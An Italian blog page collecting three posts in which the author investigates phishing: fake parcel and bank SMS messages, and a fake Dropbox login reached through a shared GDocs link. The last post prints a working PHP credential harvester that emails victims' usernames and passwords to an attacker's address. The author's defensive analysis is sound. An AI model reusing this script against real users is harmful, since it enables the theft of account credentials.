Visualizzazione post con etichetta phishing. Mostra tutti i post
Visualizzazione post con etichetta phishing. Mostra tutti i post

giovedì 16 marzo 2023

Phishing via SMS 2023

 Una variante interessante rispetto al precedente esempio di phishing via SMS visto in precedenza 

Questa volta e' stato piu' insidioso perche' viene indicata la consegna di un pacco ad un centro di ritiro...plausibile...chi e' che non riceve pacchi oggi


Andando al link viene segnalata la necessita' di pagare 2 euro di tasse doganali (plausibile...mi e' capitato di ricevere pacchi dall'estero con la necessita' di pagare le tasse)




Mi sono insospettito quando mi veniva richiesto di reinserire i miei dati personali (del resto il corriere li doveva gia' conoscere....ho guardato il sito awardau.live..e sono passato ad aprire il link sul computer per vedere i sorgenti della pagina. La cosa divertente e' andando a www.awardau.live veniva proposto una spedizione di DHL mentre il link dell'SMS indicava una spedizione GLS


Capito l'ingannno ho provato a vedere come funziona la truffa....dopo aver cliccato sul sito awardau.live si veniva instradati su Pagamento Sicuro (ovviamente finto) in cui vengono richieste tutte le informazioni sulla carta di credito (ovviamente non era presente il pagamento via Paypal) compreso il CIN.

Nel codice HTML oltre a riferimenti a JQuery era presente il link a https://track.fwdtrck.com/click
(il link e' disattivo al momento in cui scrivo) ed a pro.ip-api.con con una key scaduta





- Nessun commento:
Etichette:

martedì 31 marzo 2020

Phishing via SMS

Oggi mi e' arrivato questo SMS apparentemente proveniente dalla mia banca



ho cliccato sul link e si e' aperta una pagina con la richiesta di inserire le credenziali perche' il conto era stato limitato. Da cellulare la schermata era questa


Mi sono insospettito della URL ripristino-datiweb.com e mi sono spostato sul PC.
Una volta copiata la URL (https://ripristino-datiweb.com/verificapsd2/it/persone-e-famiglie/login-page.php?&sessionid=74c7228a6ce06a2603aa2b54e3237a8a&securessl=true) il browser mi reindirizzava in automatico a Google.com e non vedevo la schermata di login del cellulare

Lanciando la URL https://ripristino-datiweb.com la pagina era bianca con la sola scritta "Nice try :-("

(nessun altro codice ne' html ne' javascript)

Tra le altre cose sembra che il redirect basato sull'UserAgent sia gestito direttamente da Apache e non da una pagina web via Javascript con  qualche regola del tipo quella indicata a questo sito 


una ricerca sul whois riportata che la registrazione del sito e' su GoDaddy ed e' stato creato oggi

Domain Name: RIPRISTINO-DATIWEB.COM
Registry Domain ID: 2509476000_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2020-03-31T16:07:06Z
Creation Date: 2020-03-31T16:07:06Z
Registry Expiry Date: 2021-03-31T16:07:06Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com




- Nessun commento:
Etichette:

domenica 7 dicembre 2014

Nuove frontiere del Phishing : GDOCS

Oggi mi e' arrivata una mail da una persona che non conosco di persona e che mi aveva condiviso un file su GDocs


da una breve ricerca ho visto che questa persona e' collegata ad un gruppo sui Genesis su Facebook a cui sono iscritto e quindi ho cliccato sul link
Mi si e' aperta questa finestra

Dropbox ??? Che storia e' mai questa ??? Non era GDocs??
E poi guardo la Url ?? non corrisponde a server di Dropbox ma ad un servizio spagnolo (non capisco bene lo spagnolo ma non e' un servizio cloud di file sharing
Provo allora ad andare indietro di una directory su http://surynorte.cl/lee/ ed ecco la gradita sorpresa

Una directory di cui si puo' fare il listing con un file drop.zip troppo invitante per non cliccarci sopra. Lo scarico in locale e questa e' la struttura


il tempo si aprire il file submit.php ed ecco il contenuto
-----------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$time = date("m-d-Y g:i:a");
$msg = "---------------------------------------------------------------------------\n";
$msg .= "Dropbox Login Info by Abbeymilli\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Email : ".$_POST['username']."\n";
$msg .= "Password : ".$_POST['password']."\n";
$msg .= "---------------------------------------------------------------------------\n";
$msg .= "Sent from $ip on $time\n";
$msg .= "---------------------------------------------------------------------------\n";
$to = "kelvinpeter270@gmail.com,kelvinpeter270@gmail.com";
$subject = "Chi Lee Update $ip";
$from = "From: Dropbox<newsupdate@servisdropbox.com>";
mail($to,$subject,$msg,$from);
header("Location: http://www.dropbox.com");
?>
-----------------------------------

in pratica lo script invia le credenziali richieste (username e password) ad una mail. Un vero e proprio phishing (seppure un po' dilettantesco)

A chi lo segnalo questo abuso adesso?????

a proposito: chiunque tu sia signor kelvinpeter270@gmail.com, a questo giro non mi hai preso ;>



- Nessun commento:
Etichette:
Iscriviti a: Post (Atom)

Geologi

  E so anche espatriare senza praticamente toccare strada asfaltata